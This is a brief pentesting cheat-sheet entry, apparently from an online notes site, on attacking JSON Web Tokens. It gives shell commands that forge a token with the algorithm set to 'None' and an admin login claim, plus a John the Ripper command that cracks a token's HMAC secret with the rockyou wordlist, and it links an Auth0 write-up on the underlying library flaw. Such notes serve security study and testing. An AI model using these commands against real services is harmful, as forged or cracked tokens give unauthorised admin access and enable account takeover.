JWT
when manipulating the algorithm to None
https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
// flaw and leave out signature
// note the pattern
//Base64(Header).Base64(Data).Base64(Signature)
// construct our own jwt token
echo -n '{"alg": "None", "typ":"JWS"}' | base64
echo -n '{"login": "admin", "iat": "1668782937"}' | base64
crack JWT
john jwt.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
jwt.io
Last updated
Was this helpful?